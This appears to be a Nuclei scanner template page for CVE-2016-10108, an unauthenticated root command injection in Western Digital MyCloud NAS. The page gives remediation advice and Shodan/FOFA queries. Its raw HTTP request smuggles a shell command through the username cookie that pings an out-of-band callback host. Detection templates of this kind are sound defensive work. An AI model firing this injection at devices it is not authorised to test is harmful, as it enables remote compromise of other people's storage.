Skip to content
Nuclei Templates

Western Digital MyCloud NAS - Command Injection

ID: CVE-2016-10108

Severity: critical

Author: DhiyaneshDk

Tags: cve2016,cve,packetstorm,rce,oast,wdcloud,western_digital

Description

Section titled “Description”

Unauthenticated Remote Command injection as root occurs in the Western Digital MyCloud NAS 2.11.142 /web/google_analytics.php URL via a modified arg parameter in the POST data.

YAML Source

Section titled “YAML Source”
id: CVE-2016-10108


info:
  name: Western Digital MyCloud NAS - Command Injection
  author: DhiyaneshDk
  severity: critical
  description: |
    Unauthenticated Remote Command injection as root occurs in the Western Digital MyCloud NAS 2.11.142 /web/google_analytics.php URL via a modified arg parameter in the POST data.
  impact: |
    Successful exploitation of this vulnerability can lead to unauthorized access, data loss, and potential compromise of the entire network.
  remediation: |
    Apply the latest firmware update provided by Western Digital to patch the vulnerability and ensure the device is not accessible from the internet.
  reference:
    - https://web.archive.org/web/20170315123948/https://www.stevencampbell.info/2016/12/command-injection-in-western-digital-mycloud-nas/
    - https://nvd.nist.gov/vuln/detail/CVE-2016-10108
    - https://packetstormsecurity.com/files/173802/Western-Digital-MyCloud-Unauthenticated-Command-Injection.html
    - http://packetstormsecurity.com/files/173802/Western-Digital-MyCloud-Unauthenticated-Command-Injection.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2016-10108
    cwe-id: CWE-77
    epss-score: 0.86242
    epss-percentile: 0.98335
    cpe: cpe:2.3:a:western_digital:mycloud_nas:2.11.142:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: western_digital
    product: mycloud_nas
    shodan-query: http.favicon.hash:-1074357885
    fofa-query: icon_hash=-1074357885
  tags: cve2016,cve,packetstorm,rce,oast,wdcloud,western_digital


http:
  - raw:
      - |
        GET / HTTP/1.1
        Host: {{Hostname}}
        Cookie: isAdmin=1; username=admin|echo%20`ping -c 3 {{interactsh-url}}`; local_login=1


    matchers:
      - type: dsl
        dsl:
          - contains(body, "WDMyCloud")
          - contains(interactsh_protocol, "dns")
          - status_code == 200
        condition: and
# digest: 4b0a00483046022100f4b6a77702d1ee7085f841c3aebeb258c0053fb3ca6a147b72c862b64723328602210089343d3e86d44e5b93890ffe3b0270be0a664049c24bba787a905f5560712c48:922c64590222798bb761d5b6d8e72950

Guide to check the vulnerabilities

Section titled “Guide to check the vulnerabilities”

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2016/CVE-2016-10108.yaml"

View on Github